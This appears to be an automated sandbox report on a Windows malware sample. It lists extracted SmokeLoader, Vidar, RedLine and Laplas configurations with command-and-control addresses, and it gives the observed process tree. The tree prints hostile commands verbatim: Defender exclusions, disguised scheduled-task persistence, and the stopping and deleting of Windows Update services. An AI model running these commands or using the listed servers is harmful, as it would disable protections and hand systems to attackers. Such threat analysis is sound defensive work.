Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
82s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12/04/2023, 03:06
Static task
static1
Behavioral task
behavioral1
Sample
74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe
Resource
win10v2004-20230220-en
General
-
Target
74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe
-
Size
212KB
-
MD5
d0a7d700851f79d277edb894d255d857
-
SHA1
bdabd3986483dcf95be18c4057d1f0f7909e6f6e
-
SHA256
74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8
-
SHA512
e3d4160a3e818d0ad71a02ba2d3d51bf25aca0a12d2849cf7ab1363fd0d17ed6168471e6fe5053a3f5108819f139ca113503408ec9a03aaf300a1e4d00d36086
-
SSDEEP
3072:2tYU/l+KhAGQmMDMXnV7DasXIyZsBOGOq4cKVAMDfs5t1W0bLv:WYUt+wQmB3V66sEGocHG8R
Malware Config
Extracted
smokeloader
sprg
Extracted
smokeloader
2022
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
vidar
3.4
e749025c61b2caca10aa829a9e1a65a1
https://steamcommunity.com/profiles/76561199494593681
https://t.me/auftriebs
-
profile_id_v2
e749025c61b2caca10aa829a9e1a65a1
-
user_agent
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Extracted
redline
build03
65.21.3.192:32845
-
auth_value
688766d7eb9d4a5fde1dec6cdf7c3d9e
Extracted
laplas
http://185.106.92.74
-
api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2860 created 3216 2860 Tzairumea840.exe 27 -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation F24.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation FAEF.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 59494271101313438416.exe -
Executes dropped EXE 7 IoCs
pid Process 952 FAEF.exe 1412 F24.exe 664 59494271101313438416.exe 4832 72276251160032612667.exe 4536 svcservice.exe 2860 Tzairumea840.exe 3324 F24.exe -
Loads dropped DLL 2 IoCs
pid Process 952 FAEF.exe 952 FAEF.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000800000002314d-305.dat upx behavioral1/files/0x000800000002314d-307.dat upx behavioral1/files/0x000800000002314d-308.dat upx behavioral1/memory/4832-310-0x0000000000AF0000-0x0000000001953000-memory.dmp upx behavioral1/memory/4832-314-0x0000000000AF0000-0x0000000001953000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 59494271101313438416.exe Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xrdsu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Ygpxl\\Xrdsu.exe\"" F24.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 664 59494271101313438416.exe 664 59494271101313438416.exe 4536 svcservice.exe 4536 svcservice.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1412 set thread context of 3324 1412 F24.exe 118 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4804 sc.exe 3132 sc.exe 3740 sc.exe 932 sc.exe 2152 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 5072 952 WerFault.exe 85 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FAEF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FAEF.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3972 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3052 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe 3052 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3216 Explorer.EXE -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 3052 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1412 F24.exe Token: SeShutdownPrivilege 3216 Explorer.EXE Token: SeCreatePagefilePrivilege 3216 Explorer.EXE Token: SeShutdownPrivilege 3216 Explorer.EXE Token: SeCreatePagefilePrivilege 3216 Explorer.EXE Token: SeDebugPrivilege 4636 powershell.exe Token: SeShutdownPrivilege 3216 Explorer.EXE Token: SeCreatePagefilePrivilege 3216 Explorer.EXE Token: SeShutdownPrivilege 3216 Explorer.EXE Token: SeCreatePagefilePrivilege 3216 Explorer.EXE Token: SeShutdownPrivilege 3216 Explorer.EXE Token: SeCreatePagefilePrivilege 3216 Explorer.EXE Token: SeDebugPrivilege 4248 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3216 wrote to memory of 952 3216 Explorer.EXE 85 PID 3216 wrote to memory of 952 3216 Explorer.EXE 85 PID 3216 wrote to memory of 952 3216 Explorer.EXE 85 PID 3216 wrote to memory of 1412 3216 Explorer.EXE 89 PID 3216 wrote to memory of 1412 3216 Explorer.EXE 89 PID 3216 wrote to memory of 1412 3216 Explorer.EXE 89 PID 3216 wrote to memory of 4980 3216 Explorer.EXE 90 PID 3216 wrote to memory of 4980 3216 Explorer.EXE 90 PID 3216 wrote to memory of 4980 3216 Explorer.EXE 90 PID 3216 wrote to memory of 4980 3216 Explorer.EXE 90 PID 3216 wrote to memory of 2336 3216 Explorer.EXE 93 PID 3216 wrote to memory of 2336 3216 Explorer.EXE 93 PID 3216 wrote to memory of 2336 3216 Explorer.EXE 93 PID 3216 wrote to memory of 4760 3216 Explorer.EXE 94 PID 3216 wrote to memory of 4760 3216 Explorer.EXE 94 PID 3216 wrote to memory of 4760 3216 Explorer.EXE 94 PID 3216 wrote to memory of 4760 3216 Explorer.EXE 94 PID 3216 wrote to memory of 4524 3216 Explorer.EXE 95 PID 3216 wrote to memory of 4524 3216 Explorer.EXE 95 PID 3216 wrote to memory of 4524 3216 Explorer.EXE 95 PID 3216 wrote to memory of 2468 3216 Explorer.EXE 98 PID 3216 wrote to memory of 2468 3216 Explorer.EXE 98 PID 3216 wrote to memory of 2468 3216 Explorer.EXE 98 PID 3216 wrote to memory of 2468 3216 Explorer.EXE 98 PID 1412 wrote to memory of 4636 1412 F24.exe 99 PID 1412 wrote to memory of 4636 1412 F24.exe 99 PID 1412 wrote to memory of 4636 1412 F24.exe 99 PID 3216 wrote to memory of 3852 3216 Explorer.EXE 101 PID 3216 wrote to memory of 3852 3216 Explorer.EXE 101 PID 3216 wrote to memory of 3852 3216 Explorer.EXE 101 PID 3216 wrote to memory of 3852 3216 Explorer.EXE 101 PID 3216 wrote to memory of 4440 3216 Explorer.EXE 102 PID 3216 wrote to memory of 4440 3216 Explorer.EXE 102 PID 3216 wrote to memory of 4440 3216 Explorer.EXE 102 PID 3216 wrote to memory of 4440 3216 Explorer.EXE 102 PID 3216 wrote to memory of 1580 3216 Explorer.EXE 103 PID 3216 wrote to memory of 1580 3216 Explorer.EXE 103 PID 3216 wrote to memory of 1580 3216 Explorer.EXE 103 PID 3216 wrote to memory of 408 3216 Explorer.EXE 104 PID 3216 wrote to memory of 408 3216 Explorer.EXE 104 PID 3216 wrote to memory of 408 3216 Explorer.EXE 104 PID 3216 wrote to memory of 408 3216 Explorer.EXE 104 PID 952 wrote to memory of 664 952 FAEF.exe 105 PID 952 wrote to memory of 664 952 FAEF.exe 105 PID 952 wrote to memory of 664 952 FAEF.exe 105 PID 952 wrote to memory of 4832 952 FAEF.exe 107 PID 952 wrote to memory of 4832 952 FAEF.exe 107 PID 4832 wrote to memory of 3224 4832 72276251160032612667.exe 108 PID 4832 wrote to memory of 3224 4832 72276251160032612667.exe 108 PID 952 wrote to memory of 2852 952 FAEF.exe 113 PID 952 wrote to memory of 2852 952 FAEF.exe 113 PID 952 wrote to memory of 2852 952 FAEF.exe 113 PID 3224 wrote to memory of 1540 3224 cmd.exe 110 PID 3224 wrote to memory of 1540 3224 cmd.exe 110 PID 2852 wrote to memory of 3972 2852 cmd.exe 115 PID 2852 wrote to memory of 3972 2852 cmd.exe 115 PID 2852 wrote to memory of 3972 2852 cmd.exe 115 PID 664 wrote to memory of 4536 664 59494271101313438416.exe 116 PID 664 wrote to memory of 4536 664 59494271101313438416.exe 116 PID 664 wrote to memory of 4536 664 59494271101313438416.exe 116 PID 1412 wrote to memory of 2860 1412 F24.exe 117 PID 1412 wrote to memory of 2860 1412 F24.exe 117 PID 1412 wrote to memory of 3324 1412 F24.exe 118 PID 1412 wrote to memory of 3324 1412 F24.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Users\Admin\AppData\Local\Temp\74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe"C:\Users\Admin\AppData\Local\Temp\74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\FAEF.exeC:\Users\Admin\AppData\Local\Temp\FAEF.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:952 -
C:\ProgramData\59494271101313438416.exe"C:\ProgramData\59494271101313438416.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4536
-
-
-
C:\ProgramData\72276251160032612667.exe"C:\ProgramData\72276251160032612667.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\72276251160032612667.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵PID:1540
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FAEF.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3972
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 6483⤵
- Program crash
PID:5072
-
-
-
C:\Users\Admin\AppData\Local\Temp\F24.exeC:\Users\Admin\AppData\Local\Temp\F24.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:2860
-
-
C:\Users\Admin\AppData\Local\Temp\F24.exeC:\Users\Admin\AppData\Local\Temp\F24.exe3⤵
- Executes dropped EXE
PID:3324
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4980
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2336
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4760
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4524
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2468
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3852
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4440
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1580
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵PID:3260
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1344
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4272
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:896
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3972
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2852
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:4732
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3132
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3740
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:932
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2152
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4804
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4344
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4496
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2156
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2748
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4636
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yqhkxrl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵PID:4792
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:1564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 952 -ip 9521⤵PID:4452
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:1260
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD558fe5c1f5bb97d2ab8c07d9b2165d291
SHA17fa1fd096e3e299a1d12620afb5f0e8bbac501fc
SHA2569ec7b6c726d9cafca8ab233f83133e06adf5a8af6898197ffc7c5ef54b402694
SHA512ee7532ef1d4903eb4a6fddca47774358a67904ec49cbc700a2161c9f1f372bd02679fbeb4bada5cb6d940946084b080f7bbc138d4a8202fdbed5b9a8bc377e01
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5622bf737a997b9a257f15dc3b9ee9da5
SHA16beba023f9c081393b64de079969e948a47be8be
SHA256bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77
-
Filesize
1KB
MD513b08803e0bb671919478d178f19d6e2
SHA19f8c1d2a16446f9ee1e3244f48d372aecccf4dd9
SHA256bab001392f6a9fc257a302cf557c9f571c7b352f41aedda14b049976ee5fd1c9
SHA5122fe208b9958329734a5c6ce6aa526ee20d2c02d351927e75f85f27c2ffdc3c9e3413c17dc6e0dd9eefc3fb379e936b6bef2984a6e44ffafdc7600f590398016f
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD572eb8dc905a6f86c93517ae5e78a74c4
SHA13889779f4af929011d6abe8439354721c716491c
SHA256838f6e0a1264f22d5cf463bae84cc5aefb993f20a98bb2c655cb4433579b67db
SHA51221b934c6d3935336bb0babaa4ca1b9218dd83822e97e58619c330cf0a891ced5543ef5e387f6f5f06c85a2f8c4e39bfe7d12f1aa8758c431666f7cf7d1b8d11c
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
1KB
MD57422d76993e919dc014214155357d916
SHA181289435f4e706ba409d65e5c90283c3ca8c3a22
SHA256f3c0862e4a137bee1de31a4f6c81e2737d02e7c63556ab83d0803578631ec382
SHA512030343d6275818cd67ee76d575fd1547f8e72cb42260f7f923966b79438dad288bb7cee6d6300c18f103692802168c79b4210cff3cb921dc27f8215a868d4b61
-
Filesize
1.4MB
MD504a05e3080aba5e333c816493ef2635d
SHA128d558491a0756f871b986130f0e7f86639877a2
SHA25695aee7feb92f8e8f236f65399712ed5be9ca5f52c6dbec65ab650c6db63f24fb
SHA512a5316921db7096ca827d48b42c6aafd18dedfc6f5f4ccff73cec2bbd860f1ad2abefc6d97251ba3bff5d73f3ac72bd31ee092fec40d747a893baf614fd0ff498
-
Filesize
1.4MB
MD504a05e3080aba5e333c816493ef2635d
SHA128d558491a0756f871b986130f0e7f86639877a2
SHA25695aee7feb92f8e8f236f65399712ed5be9ca5f52c6dbec65ab650c6db63f24fb
SHA512a5316921db7096ca827d48b42c6aafd18dedfc6f5f4ccff73cec2bbd860f1ad2abefc6d97251ba3bff5d73f3ac72bd31ee092fec40d747a893baf614fd0ff498
-
Filesize
1.4MB
MD504a05e3080aba5e333c816493ef2635d
SHA128d558491a0756f871b986130f0e7f86639877a2
SHA25695aee7feb92f8e8f236f65399712ed5be9ca5f52c6dbec65ab650c6db63f24fb
SHA512a5316921db7096ca827d48b42c6aafd18dedfc6f5f4ccff73cec2bbd860f1ad2abefc6d97251ba3bff5d73f3ac72bd31ee092fec40d747a893baf614fd0ff498
-
Filesize
323KB
